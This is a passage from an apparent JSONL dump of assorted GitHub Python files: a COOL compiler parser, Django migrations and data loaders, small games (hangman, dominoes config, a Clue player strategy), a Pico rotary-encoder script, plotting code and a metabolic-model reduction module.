OSError as e:\n close()\n return\n await aio.sleep(1)\n\ntry:\n aio.run(run())\nexcept KeyboardInterrupt:\n print(\"Keyboard interrupt\")\nfinally:\n _ = aio.new_event_loop()\n print(\"Done\")\n\n\n# n = machine.Pin(\"LED\", machine.Pin.OUT, value=1)","repo_name":"MrSmarty/GT_SHOWCASE_2022-2023-JavaScape-","sub_path":"PicoReciever/picoRecieving2.py","file_name":"picoRecieving2.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"8321907333","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('recipes', '0003_auto_20151128_1408'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='chef',\n name='age',\n field=models.IntegerField(verbose_name=[django.core.validators.MinValueValidator(6), django.core.validators.MaxValueValidator(120)]),\n ),\n migrations.AlterField(\n model_name='chef',\n name='experience',\n field=models.CharField(max_length=1, choices=[(b'B', b'Beginner'), (b'A', b'Advanced'), (b'E', b'Expert'), (b'M', b'Magical')]),\n ),\n ]\n","repo_name":"tomkra/django-recipes-app","sub_path":"recipes/migrations/0004_auto_20151128_1411.py","file_name":"0004_auto_20151128_1411.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"23496487688","text":"import os\nfrom sly import Parser\nfrom coolpyler.lexer import CoolLexer\nfrom coolpyler.errors import UnexpectedEOFError, UnexpectedTokenError\nfrom coolpyler.ast.cool import (\n CoolAssignNode,\n CoolAttrDeclNode,\n CoolBlockNode,\n CoolBoolNode,\n CoolCaseNode,\n CoolCaseOfNode,\n CoolClassNode,\n CoolDispatchNode,\n CoolDivNode,\n CoolEqNode,\n CoolFormalNode,\n CoolFuncDeclNode,\n CoolIfThenElseNode,\n CoolIntNode,\n CoolIsVoidNode,\n CoolLeNode,\n CoolLeqNode,\n CoolLetDeclNode,\n CoolLetInNode,\n CoolMinusNode,\n CoolMultNode,\n CoolNewNode,\n CoolNotNode,\n CoolParenthNode,\n CoolPlusNode,\n CoolProgramNode,\n CoolStaticDispatchNode,\n CoolStringNode,\n CoolTildeNode,\n CoolVarNode,\n CoolWhileNode,\n)\n\n# pyright: reportUndefinedVariable=false\n# flake8: noqa\n\nDEBUG = True\n\n\nclass CoolLogger(object):\n def __init__(self, f=None):\n if f is None:\n f = open(os.devnull, \"w\")\n self.f = open(f, \"w\") if isinstance(f, str) else f\n\n def debug(self, msg, *args, **kwargs):\n self.f.write((msg % args) + \"\\n\")\n\n info = debug\n\n def warning(self, msg, *args, **kwargs):\n self.f.write(\"WARNING: \" + (msg % args) + \"\\n\")\n\n def error(self, msg, *args, **kwargs):\n self.f.write(\"ERROR: \" + (msg % args) + \"\\n\")\n\n critical = debug\n\n\nclass CoolParser(Parser):\n log = CoolLogger(\"parser.log\" if DEBUG else None)\n debugfile = \"parser.out\" if DEBUG else None\n\n tokens = CoolLexer.tokens - {\"INLINE_COMMENT\", \"OCOMMENT\"}\n\n precedence = (\n (\"left\", \"DOT\"),\n (\"left\", \"AT\"),\n (\"right\", \"TILDE\"),\n (\"right\", \"ISVOID\"),\n (\"left\", \"STAR\", \"SLASH\"),\n (\"left\", \"PLUS\", \"MINUS\"),\n (\"nonassoc\", \"LEQ\", \"LE\", \"EQ\"),\n (\"right\", \"NOT\"),\n (\"right\", \"LEFT_ARROW\"),\n # (\"right\", \"IN\"),\n )\n\n def __init__(self, errors=None):\n if errors is None:\n errors = []\n self.errors = errors\n\n @_(\"cool_class SEMICOLON { cool_class SEMICOLON }\")\n def program(self, p):\n classes = [p.cool_class0] + 
p.cool_class1\n return CoolProgramNode(classes)\n\n @_(\"CLASS TYPE_ID [ INHERITS TYPE_ID ] OCURLY { feature SEMICOLON } CCURLY\")\n def cool_class(self, p):\n name, parent, features = p.TYPE_ID0, p.TYPE_ID1, p.feature\n return CoolClassNode(name, features, parent=parent)\n\n @_(\"OBJECT_ID COLON TYPE_ID [ LEFT_ARROW expr ]\")\n def feature(self, p):\n id, type, expr = p.OBJECT_ID, p.TYPE_ID, p.expr\n return CoolAttrDeclNode(id, type, expr)\n\n @_(\"OBJECT_ID OPAR [ formal_list ] CPAR COLON TYPE_ID OCURLY expr CCURLY\")\n def feature(self, p):\n id = p.OBJECT_ID\n params = p.formal_list if p.formal_list is not None else []\n type, body = p.TYPE_ID, p.expr\n return CoolFuncDeclNode(id, params, type, body)\n\n @_(\"formal { COMMA formal }\")\n def formal_list(self, p):\n return [p.formal0] + p.formal1\n\n @_(\"OBJECT_ID COLON TYPE_ID\")\n def formal(self, p):\n id, type = p.OBJECT_ID, p.TYPE_ID\n return CoolFormalNode(id, type)\n\n @_(\"OBJECT_ID LEFT_ARROW expr\")\n def expr(self, p):\n id, expr = p.OBJECT_ID, p.expr\n return CoolAssignNode(id, expr)\n\n @_(\"expr AT TYPE_ID DOT OBJECT_ID OPAR [ arg_list ] CPAR\")\n def expr(self, p):\n expr, type, id = p.expr, p.TYPE_ID, p.OBJECT_ID\n args = p.arg_list if p.arg_list is not None else []\n return CoolStaticDispatchNode(expr, type, id, args)\n\n @_(\"expr DOT OBJECT_ID OPAR [ arg_list ] CPAR\")\n def expr(self, p):\n expr, id = p.expr, p.OBJECT_ID\n args = p.arg_list if p.arg_list is not None else []\n return CoolDispatchNode(id, args, expr=expr)\n\n @_(\"OBJECT_ID OPAR [ arg_list ] CPAR\")\n def expr(self, p):\n id = p.OBJECT_ID\n args = p.arg_list if p.arg_list is not None else []\n return CoolDispatchNode(id, args)\n\n @_(\"expr { COMMA expr }\")\n def arg_list(self, p):\n return [p.expr0] + p.expr1\n\n @_(\"IF expr THEN expr ELSE expr FI\")\n def expr(self, p):\n cond, then_expr, else_expr = p.expr0, p.expr1, p.expr2\n return CoolIfThenElseNode(cond, then_expr, else_expr)\n\n @_(\"WHILE expr LOOP expr POOL\")\n def expr(self, p):\n cond, body = p.expr0, p.expr1\n return CoolWhileNode(cond, body)\n\n @_(\"OCURLY expr SEMICOLON { expr SEMICOLON } CCURLY\")\n def expr(self, p):\n expr_list = [p.expr0] + p.expr1\n return CoolBlockNode(expr_list)\n\n @_(\"LET let_decl { COMMA let_decl } IN expr\")\n def expr(self, p):\n decl_list = [p.let_decl0] + p.let_decl1\n expr = p.expr\n return CoolLetInNode(decl_list, expr)\n\n @_(\"OBJECT_ID COLON TYPE_ID [ LEFT_ARROW expr ]\")\n def let_decl(self, p):\n id, type, expr = p.OBJECT_ID, p.TYPE_ID, p.expr\n return CoolLetDeclNode(id, type, expr=expr)\n\n @_(\"CASE expr OF case SEMICOLON { case SEMICOLON } ESAC\")\n def expr(self, p):\n expr = p.expr\n case_list = [p.case0] + p.case1\n return CoolCaseOfNode(expr, case_list)\n\n @_(\"OBJECT_ID COLON TYPE_ID RIGHT_ARROW expr\")\n def case(self, p):\n id, type, expr = p.OBJECT_ID, p.TYPE_ID, p.expr\n return CoolCaseNode(id, type, expr)\n\n @_(\"NEW TYPE_ID\")\n def expr(self, p):\n type = p.TYPE_ID\n return CoolNewNode(type)\n\n @_(\"OPAR expr CPAR\")\n def expr(self, p):\n expr = p.expr\n return CoolParenthNode(expr)\n\n @_(\"ISVOID expr\")\n def expr(self, p):\n expr = p.expr\n return CoolIsVoidNode(expr)\n\n @_(\"TILDE expr\")\n def expr(self, p):\n expr = p.expr\n return CoolTildeNode(expr)\n\n @_(\"NOT expr\")\n def expr(self, p):\n expr = p.expr\n return CoolNotNode(expr)\n\n @_(\"expr PLUS expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolPlusNode(left_expr, right_expr)\n\n @_(\"expr MINUS expr\")\n def expr(self, 
p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolMinusNode(left_expr, right_expr)\n\n @_(\"expr STAR expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolMultNode(left_expr, right_expr)\n\n @_(\"expr SLASH expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolDivNode(left_expr, right_expr)\n\n @_(\"expr LE expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolLeNode(left_expr, right_expr)\n\n @_(\"expr LEQ expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolLeqNode(left_expr, right_expr)\n\n @_(\"expr EQ expr\")\n def expr(self, p):\n left_expr, right_expr = p.expr0, p.expr1\n return CoolEqNode(left_expr, right_expr)\n\n @_(\"OBJECT_ID\")\n def expr(self, p):\n return CoolVarNode(p.OBJECT_ID)\n\n @_(\"INT\")\n def expr(self, p):\n value = p.INT\n return CoolIntNode(value)\n\n @_(\"STRING\")\n def expr(self, p):\n value = p.STRING\n return CoolStringNode(value)\n\n @_(\"TRUE\")\n def expr(self, p):\n value = p.TRUE\n return CoolBoolNode(value)\n\n @_(\"FALSE\")\n def expr(self, p):\n value = p.FALSE\n return CoolBoolNode(value)\n\n # error rules\n # TODO: parser recovery and resynchronization with error rules\n\n def error(self, token):\n if token is None:\n self.errors.append(UnexpectedEOFError())\n else:\n self.errors.append(\n UnexpectedTokenError(\n token.lineno, token.columnno, f\"({token.type}, {token.value})>\"\n )\n )\n","repo_name":"RodrigoGarcia43/cool-compiler-2021","sub_path":"src/coolpyler/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"7152419073","text":"from pygame import *\nfrom gloss import *\n\nfrom tools import *\n\nimport os\nimport ConfigParser\n\ndef load_config():\n \"\"\" @brief loads a config dictionary\n \n This function reads game configuration from a file. 
It tries to read config\n from file, if does not exists (first execution) it creates a new file with\n default config.\n \"\"\"\n file = \"config.ini\"\n\n config = ConfigParser.RawConfigParser()\n\n if not os.path.exists(file):\n # file does not exist, so lets create it\n config.add_section('General')\n config.set('General', 'name', 'Dominous')\n config.set('General', 'window_caption', 'Dominous, an open source dominoes simulator')\n config.set('General', 'lang', 'en')\n config.set('General', 'points_per_game', '200')\n config.add_section('Screen')\n config.set('Screen', 'window_width', '800')\n config.set('Screen', 'window_height', '600')\n config.set('Screen', 'full_screen', 'False')\n config.set('Screen', 'window_favicon', os.path.join('images', 'favicon.png'))\n config.add_section('Theme')\n config.set('Theme', 'theme', 'spanish')\n config.add_section('Game')\n config.set('Game', 'player2', 'easy')\n config.set('Game', 'player3', 'easy')\n config.set('Game', 'player4', 'easy')\n # writing our configuration file to file\n with open(file, 'wb') as configfile:\n config.write(configfile)\n\n # load file\n config = ConfigParser.RawConfigParser()\n config.read(file)\n config_default = {\n 'name': config.get('General', 'name'),\n 'window_caption': config.get('General', 'window_caption'),\n 'window_width': config.getint('Screen', 'window_width'),\n 'window_height': config.getint('Screen', 'window_height'),\n 'full_screen': config.get('Screen', 'full_screen'),\n 'window_favicon': config.get('Screen', 'window_favicon'),\n 'tile_width': 525,\n 'tile_height': 270,\n 'scale': 0.2,\n 'theme': config.get('Theme', 'theme'),\n 'lang': config.get('General', 'lang'),\n 'points_per_game': config.get('General', 'points_per_game'),\n 'gametype': 'human',\n 'gametype_current': 'single',\n 'player1': 'easy',\n 'player2': 'easy',\n 'player3': 'easy',\n 'player4': 'easy',\n 'speed': '1',\n }\n return config_default\n\ndef save_config(config_new):\n config = ConfigParser.RawConfigParser()\n config.add_section('General')\n config.set('General', 'name', 'Dominous')\n config.set('General', 'window_caption', 'Dominous, an open source dominoes simulator')\n config.set('General', 'lang', config_new['lang'])\n config.set('General', 'points_per_game', config_new['points_per_game'])\n config.add_section('Screen')\n config.set('Screen', 'window_width', config_new['window_width'])\n config.set('Screen', 'window_height', config_new['window_height'])\n config.set('Screen', 'full_screen', config_new['full_screen'])\n config.set('Screen', 'window_favicon', os.path.join('images', 'favicon.png'))\n config.add_section('Theme')\n config.set('Theme', 'theme', config_new['theme'])\n # writing our configuration file to file\n with open(\"config.ini\", 'wb') as configfile:\n config.write(configfile)\n\nconfig = load_config()\n","repo_name":"3oheme/dominous","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"23420965942","text":"import json\nimport os\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom Lib import Security\nimport config\n\nclass ExpDA:\n \"\"\"description of class\"\"\"\n \n def getExpHash(exp):\n return Security.GenerateMD5(exp.results)\n\n def generateViolinPlots(exp, forceCreate = False):\n md5Name = ExpDA.getExpHash(exp)\n \n rd = json.loads(exp.results)\n methods = sorted(list(rd.keys()))\n\n \n compPath = 
config.plotsPath+md5Name+'/'\n if os.path.exists(compPath+'done.confirm') and not forceCreate:\n return md5Name\n \n\n mesMtdData = {}\n perDsMtdData = {}\n \n measures = None\n\n datasets = None\n\n PerMeasureMethods = {}\n\n for method in methods:\n mesMtdData = {}\n if datasets == None:\n datasets = sorted(list(rd[method].keys()))\n \n if measures == None:\n measures = sorted(list(rd[method][datasets[0]]['measures'].keys()))\n \n for m in measures:\n mesMtdData[m] = []\n if m not in PerMeasureMethods:\n PerMeasureMethods[m] = {}\n PerMeasureMethods[m][method] = []\n for m in measures:\n for ds in datasets:\n mesMtdData[m]+=rd[method][ds]['measures'][m]\n PerMeasureMethods[m][method]+=rd[method][ds]['measures'][m]\n\n \n fig,ax = plt.subplots(ncols = 1,nrows = 1,figsize=(10,3))\n fig.tight_layout() \n ax.set_ylim([0, 1])\n ax.set_xlim([0,len(mesMtdData.keys())+1])\n ax.set_xticks([i+1 for i in range(len(mesMtdData.keys()))])\n\n ax.set_title(\"Measures for Method: \"+method)\n \n skeys = sorted(mesMtdData.keys(), key=lambda k: np.median(mesMtdData[k]))\n pos = 1\n for lbl in skeys:\n ax.text(pos-0.5, 0.3+len(lbl)/70, lbl, rotation=90) \n pos+=1\n \n #ax.set_xticklabels(lbls) \n prt=ax.violinplot([mesMtdData[m] for m in skeys],showmeans=True,showmedians = True)\n prt['cmeans'].set_facecolor('black')\n prt['cmeans'].set_edgecolor('black')\n prt['cmeans'].set_linestyle('--')\n prt['cmeans'].set_linewidth(3)\n \n if not os.path.exists(compPath):\n os.makedirs(compPath)\n\n fig.savefig(compPath+'MethodMeasure_'+method+'.svg', format='svg')\n #fig.savefig(picPath+'1'+names[field]+'.jpg', format='jpg', dpi=100)\n #plt.cla()\n #plt.clf()\n fig.clf()\n ax.cla()\n plt.close('all')\n fig = None\n ax = None\n\n\n\n\n #Make it better, not good.\n #for m in measures:\n # for ds in datasets:\n # fig,ax = plt.subplots(ncols = 1,nrows = 1,figsize=(10,3))\n # fig.tight_layout() \n # ax.set_ylim([0, 1])\n # ax.set_xlim([0,len(methods)+1])\n # ax.set_xticks([i+1 for i in range(len(methods))])\n\n # skeys = sorted(methods, key=lambda k: np.median(rd[k][ds]['measures'][m]))\n # pos = 1\n # for lbl in skeys:\n # ax.text(pos-0.5, 0.3+len(lbl)/70, lbl, rotation=90) \n # pos+=1\n \n # #ax.set_xticklabels(lbls) \n # prt=ax.violinplot([rd[sk][ds]['measures'][m] for sk in skeys],showmeans=True,showmedians = True)\n # prt['cmeans'].set_facecolor('black')\n # prt['cmeans'].set_edgecolor('black')\n # prt['cmeans'].set_linestyle('--')\n # prt['cmeans'].set_linewidth(3)\n \n \n # if not os.path.exists(compPath):\n # os.makedirs(compPath)\n # ax.set_title(m+ ' performance for method(s) on '+ds+' dataset')\n # fig.savefig(compPath+'MeasureDS_'+str(measures.index(m))+'-'+str(datasets.index(ds))+'.svg', format='svg')\n # #fig.savefig(picPath+'1'+names[field]+'.jpg', format='jpg', dpi=100)\n # #plt.cla()\n # #plt.clf()\n # fig.clf()\n # ax.cla()\n \n # plt.close('all')\n # fig = None\n # ax = None\n file = open(compPath+'done.confirm','w')\n file.close()\n\n return md5Name","repo_name":"rebvar/datasci.datalytikz.com","sub_path":"MyDS/DA/ExpDA.py","file_name":"ExpDA.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3820921165","text":"import random\n\nfrom strategies import RandomPlayer\n\n# Probability for cheating in first round 1/1000, in second round 2/1000, ...\nCHEATING_PROB = 1000.0\n\n\nclass CheatingRandomPlayer(RandomPlayer):\n \"\"\"\n Like random player but manages with a certain growing probability to look 
into the crime cards\n    and then use that information to make an accusation\n    \"\"\"\n\n    def __init__(self, figure):\n        super().__init__(figure)\n        self.round_counter = 0\n        self.STRATEGY = \"CHEATING_RANDOM\"\n\n    def next_question(self):\n        self.round_counter += 1\n\n        # Randomly decide to cheat (with increasing probability during the game)\n        if random.random() < self.round_counter / CHEATING_PROB:\n            # Cheat (use the crime information from game object for accusation)\n            self.current_question = (\n                True,\n                self.game.crime_figure,\n                self.game.crime_weapon,\n                self.game.crime_scene\n            )\n            return self.current_question\n        else:\n            # Do not cheat but use random player strategy\n            return super().next_question()\n","repo_name":"bhaettasch/computer-plays-clue","sub_path":"strategies/cheating_random_player.py","file_name":"cheating_random_player.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"6211766336","text":"from pyjamas.ui.HorizontalPanel import HorizontalPanel\nfrom pyjamas.ui.Composite import Composite\nfrom pyjamas.Canvas.GWTCanvas import GWTCanvas\nfrom game import Game\n\nclass Widget(Composite):\n    def __init__(self, SW, SH):\n        self.canvas = Canvas(SW, SH)\n\n    def draw(self, game):\n        self.canvas.draw(game)\n\nclass Canvas(HorizontalPanel):\n    def __init__(self, SW, SH):\n        HorizontalPanel.__init__(self)\n        self.SW = SW\n        self.SH = SH\n        self.context = GWTCanvas(SW, SH, SW, SH)\n        self.context.addStyleName(\"gwt-canvas\")\n        self.add(self.context)\n\n    def draw(self, game):\n        self.context.fillStyle = \"#00AA00\"\n        self.context.fillRect(0, 0, self.SW, self.SH)\n","repo_name":"roytu/OthelloBot","sub_path":"widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"22658313446","text":"import os\nimport sys\n\nFS=44100\nOCT_CMD = 'octave --silent --eval \"splitAudioFile(\\'INFILE\\',\\'OUTDIR\\',FS,FROMS, TOS, INDEX); exit;\"'\n\ndef chop(inwav, intxt, outdir):\n    ctr = 0\n    for line in open(intxt):\n        parts = line.split()\n        fromS = (parts[0])\n        toS = (parts[1])\n        cmd = OCT_CMD.replace('INFILE',inwav).replace('OUTDIR',outdir).replace('FS',str(FS)).replace('FROMS',fromS).replace('TOS',toS).replace('INDEX',str(ctr))\n        os.system(cmd)\n    \n    \nif __name__==\"__main__\":\n    chop(sys.argv[1],sys.argv[2],sys.argv[3])","repo_name":"annakaa/Bot-hemianRhapsody","sub_path":"tools/chop.py","file_name":"chop.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"15466800033","text":"from machine import Pin\r\nfrom time import sleep\r\nimport tm1637\r\nfrom utime import sleep\r\n\r\ntm = tm1637.TM1637(clk=Pin(4), dio=Pin(5))\r\nRoA_Pin = 0 # CLK\r\nRoB_Pin = 1 # DT\r\nBtn_Pin = 2 # SW\r\n\r\nglobalCounter = 0 # counter value\r\n\r\nflag = 0 # Whether the rotation flag occurs\r\nLast_RoB_Status = 0 # DT state\r\nCurrent_RoB_Status = 0 # CLK state\r\n\r\n\r\ndef setup():\r\n    global clk_RoA\r\n    global dt_RoB\r\n    global sw_BtN\r\n    \r\n    clk_RoA = Pin(RoA_Pin,Pin.IN) \r\n    dt_RoB = Pin(RoB_Pin,Pin.IN) \r\n    sw_BtN = Pin(Btn_Pin,Pin.IN, Pin.PULL_UP) \r\n    # # Initialize the interrupt function, when the SW pin is 0, the interrupt is enabled\r\n    sw_BtN.irq(trigger=Pin.IRQ_FALLING,handler=btnISR)\r\n\r\n# Rotation code direction bit judgment function\r\ndef rotaryDeal():\r\n    global flag \r\n    global Last_RoB_Status\r\n    global 
Current_RoB_Status\r\n global globalCounter \r\n\r\n Last_RoB_Status = dt_RoB.value() \r\n # Judging the level change of the CLK pin to distinguish the direction\r\n while(not clk_RoA.value()): \r\n Current_RoB_Status = dt_RoB.value() \r\n flag = 1 # Rotation mark occurs\r\n if flag == 1: # The flag bit is 1 and a rotation has occurred\r\n flag = 0 # Reset flag bit\r\n if (Last_RoB_Status == 0) and (Current_RoB_Status == 1):\r\n globalCounter = globalCounter + 1 # counterclockwise, positive\r\n if (Last_RoB_Status == 1) and (Current_RoB_Status == 0):\r\n globalCounter = globalCounter - 1 # Clockwise, negative\r\n\r\n# Interrupt function, when the SW pin is 0, the interrupt is enabled\r\ndef btnISR(chn):\r\n global globalCounter\r\n globalCounter = 0 \r\n print ('globalCounter = %d' % globalCounter)\r\n while True:\r\n # Define a counter that changes every 1 second\r\n tm.number(globalCounter)\r\n globalCounter = globalCounter - 1\r\n sleep(1)\r\n if globalCounter == 0:\r\n break\r\n\r\ndef loop():\r\n global globalCounter \r\n tmp = 0 \r\n while True:\r\n rotaryDeal() \r\n if tmp != globalCounter: \r\n print ('globalCounter = %d' % globalCounter) \r\n tmp = globalCounter \r\n tm.number(globalCounter)\r\n \r\n\r\nif __name__ == '__main__': \r\n setup() \r\n loop() \r\n\r\n","repo_name":"Luciano2018/PicoBooks","sub_path":"Lesson 21ú¦Electronic Hourglass/21. Electronic Hourglass.py","file_name":"21. Electronic Hourglass.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19092067376","text":"from django.db import IntegrityError\nfrom django.db.models import ProtectedError\nfrom stamdata3.StamdataExceptions import InvalidRelation\nfrom .load_data import LoadData\nfrom ..models import Resource, Employment, Function, CostCenter, WorkPlace, Organisation\nfrom stamdata3.Resource import Resource as Resource_stamdata\n\n\nclass LoadResources(LoadData):\n def load(self, include_inactive=True):\n orphans = Resource.objects.filter(company__companyCode=self.company_code)\n resources = self.stamdata.resources()\n for resource in resources:\n if resource.company_code != self.company_code:\n raise ValueError('Company code %s in file, %s requested' % (resource.company_code, self.company_code))\n resource_obj, created = Resource.objects.get_or_create(\n company=self.company,\n resourceId=resource.resource_id)\n\n resource_obj.firstName = resource.first_name\n resource_obj.lastName = resource.last_name\n resource_obj.socialSecurityNumber = resource.ssn\n resource_obj.status = resource.status\n\n resource_obj.save()\n orphans = orphans.exclude(id=resource_obj.id)\n\n self.load_employments(resource, resource_obj, include_inactive)\n for orphan in orphans:\n try:\n orphan.delete()\n except ProtectedError:\n print('Protected relations: %s' % orphan)\n except IntegrityError as e:\n print('Error deleting %s: %s' % (orphan, e))\n\n def load_employments(self, resource: Resource_stamdata, resource_obj: Resource, include_inactive=True):\n \"\"\"\n :param include_inactive: Include inactive resources\n :param resource: stamdata3 resource object\n :param resource_obj: django resource object\n \"\"\"\n\n orphans = resource_obj.employments.all()\n for employment in resource.employments:\n try:\n emp = Employment.objects.get(resource=resource_obj, sequenceRef=employment.sequence_ref)\n except Employment.DoesNotExist:\n emp = Employment(resource=resource_obj, sequenceRef=employment.sequence_ref)\n\n emp.employmentType = 
employment.type\n            emp.employmentTypeDescription = employment.type_description\n            emp.mainPosition = employment.main_position\n            emp.percentage = employment.percentage\n            emp.postId = employment.post_id\n            emp.postIdDescription = employment.post_id_description\n            emp.postCode = employment.post_code\n            emp.postCodeDescription = employment.post_code_description\n\n            try:\n                function = employment.relation('FUNCTION')\n                try:\n                    emp.function = Function.objects.get(value=function.value, company=None)\n                except Function.DoesNotExist:\n                    print('Function %s does not exist (resource %s in company %s)' % (function.value, resource.resource_id, resource.company_code))\n            except InvalidRelation as e:\n                print(e)\n\n            try:\n                emp.costCenter = self.load_cost_center(employment)\n            except InvalidRelation as e:\n                print(e)\n\n            try:\n                emp.workPlace = self.load_work_place(employment)\n            except InvalidRelation:\n                pass\n\n            try:\n                emp.organisation = self.load_organisation(employment)\n            except InvalidRelation as e:\n                print(e)\n\n            emp.dateFrom = employment.date_from\n            emp.dateTo = employment.date_to\n            if not include_inactive and not emp.active():\n                continue\n\n            emp.save()\n            if emp.mainPosition:\n                resource_obj.mainPosition = emp\n                resource_obj.save()\n\n            orphans = orphans.exclude(id=emp.id)\n\n        orphans.delete()\n\n    def load_cost_center(self, employment):\n        relation = employment.relation('COST_CENTER')\n        cost_center, created = CostCenter.objects.get_or_create(\n            company=self.company,\n            value=relation.value,\n            defaults={'description': relation.description})\n        return cost_center\n\n    def load_work_place(self, employment):\n        relation = employment.relation('WORK_PLACE')\n        workplace, created = WorkPlace.objects.get_or_create(\n            company=self.company,\n            value=relation.value,\n            defaults={'description': relation.description})\n        return workplace\n\n    def load_organisation(self, employment):\n        relation = employment.relation('ORGANIZATIONAL_UNIT')\n        try:\n            return Organisation.objects.get(\n                company=self.company,\n                orgId=relation.value)\n\n        except Organisation.DoesNotExist:\n            print('Organisation %s does not exist' % relation.value)\n","repo_name":"StorFollo-IKT/django-stamdata3","sub_path":"employee_info/load_data/load_resources.py","file_name":"load_resources.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"30869040796","text":"import random\nimport art\nimport words\nwords.parse_words()\nword_list = words.get_words()\n\nrandom_choice = random.choice(word_list)\n\n# test\n# print(random_choice)\n\nblanks = []\nfor blank in range(len(random_choice)):\n    blanks.append(\"_\")\n\nprint(''.join(blanks))\nprint('Hi. I have picked a word for you. Try to guess it')\nused_letters = []\nlives = 6\nwhile \"_\" in blanks:\n    user_choice = input('Letter: ').lower()\n    if user_choice in used_letters:\n        print(\"You have already tried that letter\")\n    elif user_choice not in random_choice:\n        used_letters.append(user_choice)\n        print(f\"Used letters: {', '.join(used_letters)}\")\n        lives -= 1\n        print(\"There is no such letter\")\n    else:\n        used_letters.append(user_choice)\n        print(f\"Used letters: {', '.join(used_letters)}\")\n        for position in range(len(random_choice)):\n            if user_choice == random_choice[position]:\n                blanks[position] = user_choice\n    print(\"\".join(blanks))\n    print(art.stages[lives])\n    if \"_\" not in blanks:\n        print(\"Hooray! 
You won!\")\n        break\n    if lives == 0:\n        print('You lost :(')\n        print(f\"The word was {random_choice}\")\n        break\n\n\n\n\n\n","repo_name":"ansmtz/hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"36757060658","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport helpers\n#import nltk\n\nfrom analyzer import Analyzer\nfrom termcolor import colored\n\ndef main():\n\n    # ensure proper usage\n    if len(sys.argv) != 2:\n        sys.exit(\"Usage: ./tweets @username\")\n    \n    # create screen_name variable using 2nd argument \n    screen_name = sys.argv[1]\n    \n    # call get_user_timeline function \n    tweets = helpers.get_user_timeline(screen_name, 50)\n    \n    # if query to Twitter failed, exit the program\n    if tweets is None:\n        sys.exit(\"No query results returned\")\n    \n    # absolute paths to lists\n    positives = os.path.join(sys.path[0], \"positive-words.txt\")\n    negatives = os.path.join(sys.path[0], \"negative-words.txt\")\n    \n    # instantiate the analyzer\n    analyzer = Analyzer(positives, negatives)\n    \n    # iterate through list of tweets\n    for tweet in tweets:\n        # pass each tweet through the analyzer and get the score\n        score = analyzer.analyze(tweet)\n        # print appropriate result \n        if score > 0.0:\n            print(colored(\"{} {}\".format(score, tweet), \"green\"))\n        elif score < 0.0:\n            print(colored(\"{} {}\".format(score, tweet), \"red\"))\n        else:\n            print(colored(\"{} {}\".format(score, tweet), \"yellow\"))\n    \n    \nif __name__ == \"__main__\":\n    main()\n    \n","repo_name":"jmak24/CS50-2017","sub_path":"pset6/sentiments/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"7696224091","text":"\"\"\" Implementation of the conjunctive reduction method proposed in:\n\nMachado, D, et al. 
(2010) \"Model transformation of metabolic networks using a Petri net based framework.\"\nInternational Workshop on Biological Processes & Petri Nets (BioPPN).\n\"\"\"\nfrom __future__ import division\n\nfrom builtins import str\n\nfrom framed.model.model import Reaction\nfrom framed.model.cbmodel import CBModel\nfrom uuid import uuid4\nimport warnings\n\n\ndef balanced_model_reduction(model, metabolites, fluxes, must_keep=None, max_degree=None, clean_null_fluxes=True,\n clean_disconnected=True, abstol=1e-9):\n if clean_null_fluxes:\n model.remove_reactions([r_id for r_id, val in fluxes.items() if abs(val) < abstol])\n\n if max_degree:\n m_r_table = model.metabolite_reaction_lookup()\n metabolites = [m_id for m_id in metabolites if len(m_r_table[m_id]) <= max_degree]\n\n for m_id in metabolites:\n remove_balanced_metabolite(model, m_id, fluxes, must_keep, abstol)\n\n if clean_disconnected:\n model.remove_metabolites(_disconnected_metabolites(model), safe_delete=False)\n\n\ndef remove_balanced_metabolite(model, m_id, fluxes, must_keep=None, abstol=1e-9):\n neighbours = _metabolite_neighbours(model, [m_id])\n\n balance = sum([model.stoichiometry[(m_id, r_id)] * fluxes[r_id] for r_id in neighbours])\n turnover = sum([abs(model.stoichiometry[(m_id, r_id)] * fluxes[r_id]) for r_id in neighbours]) / 2.0\n\n # 